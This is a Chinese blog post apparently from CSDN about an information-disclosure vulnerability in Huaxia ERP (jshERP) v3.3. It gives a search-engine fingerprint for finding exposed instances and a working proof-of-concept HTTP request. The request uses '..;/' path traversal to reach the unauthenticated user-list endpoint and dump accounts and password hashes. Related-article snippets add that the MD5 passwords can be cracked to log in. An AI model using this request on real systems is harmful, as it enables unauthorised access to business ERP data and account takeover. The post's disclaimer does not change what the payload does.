华夏ERPV3.3存在信息泄漏漏洞

最新推荐文章于 2024-10-04 19:43:10 发布
最新推荐文章于 2024-10-04 19:43:10 发布
阅读量505 收藏 3
点赞数 12
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/141368235
版权

1 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

2 漏洞描述


jshERP立志为中小企业提供开源好用的ERP软件,降低企业的信息化成本,目前专注进销存+财务功能。主要模块有零售管理、入库管理、出库管理、组装拆卸、财务管理、报表查询、基础数据、系统管理等。支持预付款、收入支出、仓库调拨、采购销售、礼品卡等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面,精确到每个按钮和菜单。

该系统存在敏感信息泄露漏洞,通过此漏洞攻击者可以获取系统用户,登录用户名,密码,职位等个人敏感信息。

3.漏洞复现

hunter:web.icon=="f6efcd53ba2b07d67ab993073c238a11"

 

 poc

GET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

 

 

 

 

天官赐福万无禁忌
关注
专栏目录
华夏ERP信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
11-27 376
该系统存在敏感信息泄露漏洞,通过此漏洞攻击者可以获取系统用户,登录用户名,密码,职位等个人敏感信息
华夏ERP getAllList信息泄露漏洞复现(CVE-2024-0490)
0xSec
01-16 1680
华夏ERP 系统中存在一个问题,被评定为有问题的。该问题影响了文件/user/getAllList的某些未知处理过程。未经身份验证的攻击者可以利用此问题获取后台用户名密码列表。可导致后台被控,漏洞已被公开披露,可能被利用。
华夏ERP存在泄露用户名和密码敏感漏洞(CNVD-2020-63964)
nnn2188185的博客
06-16 1838
华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。 华夏ERP系统存在敏感信息漏洞,攻击者可利用该漏洞获取敏感信息
浪潮GS企业管理软件 多处 .NET反序列化RCE漏洞
weixin_43167326的博客
07-30 990
浪潮GS企业管理软件产品是一款面向大中型集团企业的全面解决方案,它基于Microsoft.NET技术路线和SOA(面向服务的架构),采用SOA架构和先进开放的GSP应用中间件开发,支持Web服务和Xml进行远程通信及数据交换。旨在帮助大中型集团企业实现资源整合、流程优化和智能决策,提升管理水平和竞争力。
华夏ERP存在泄露用户名和密码敏感漏洞(CNVD-2020-63964)
失心少年
06-19 816
华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。
[漏洞复现]华夏erp账号密码泄露
qq_17754023的博客
06-22 1383
描述华夏 ERP 是一个基于SpringBoot框架和 SaaS模式的系统。华夏 ERP 存在帐号密码泄露漏洞,攻击者可利用该漏洞获取系统所有账号密码从而登录系统进行恶意攻击。目前官方暂未发布安全版本修复此漏洞,建议联系厂商获取加固建议。fofa语法:"jshERP-boot"
华夏ERP v3.3.zip
04-02
华夏ERP v3.3.zip
华夏ERP部署操作手册
bjshsj的博客
11-20 783
Jsherp3.3-最新包。Redis64压缩包。
华夏账号密码信息泄露漏洞-漏洞复现
weixin_43167326的博客
01-20 589
jshERP立志为中小企业提供开源好用的。
华夏ERP信息泄露
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
08-06 608
华夏ERP是一种企业资源规划(ERP)软件,旨在为企业提供全面的信息管理和集成解决方案,以提高效率、降低成本并优化业务流程。华夏ERP通常用于中小型企业。华夏ERP前台泄露了某api接口,恶意攻击者可通过调用该接口,对用户的账号和密码进行非授权访问,在获取到账号和密码后,恶意攻击者可接管后台。定期备份和灾难恢复计划:定期备份敏感信息,并建立有效的灾难恢复计划,以便在数据泄露事件发生时能够快速恢复数据。定期更新和修补软件漏洞:及时更新和修补系统和应用程序的漏洞,以减少攻击者利用漏洞获取敏感信息的可能性。
华夏ERP_v2.3.1最新版SQL与RCE的审计过程1
08-03
前言认证绕过华夏ERP_v2.3.1最新版SQL与RCE的审计过程1.6. public class LogCostFilter implements Filt
华夏ERP存在泄露用户名和密码敏感漏洞复现
m0_49025459的博客
07-18 606
密码是MD5加密的,我们只需要正常的去解密,然后输入账号密码即可。
华夏ERP账号密码泄露漏+RCE
weixin_62352348的博客
01-18 779
华夏ERP账号密码泄露漏+RCE
华夏ERP账号密码泄露漏洞
最新发布
2301_77012231的博客
10-04 287
华夏ERP账号密码泄露漏。
「Java代码审计」华夏ERP3.0代码审计
qq_50854662的博客
10-13 948
「Java代码审计」华夏ERP3.0代码审计
华夏ERP getAllList;.ico敏感信息泄露漏洞
Keepb1ue的博客
12-22 881
华夏ERP是基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,可以获取到系统的账号密码。将password的值进行md5解密为明文,即可登录。对相关接口进行限制访问、鉴权。
漏洞复现 POC 综合
qq_56895879的博客
08-14 1176
漏洞复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值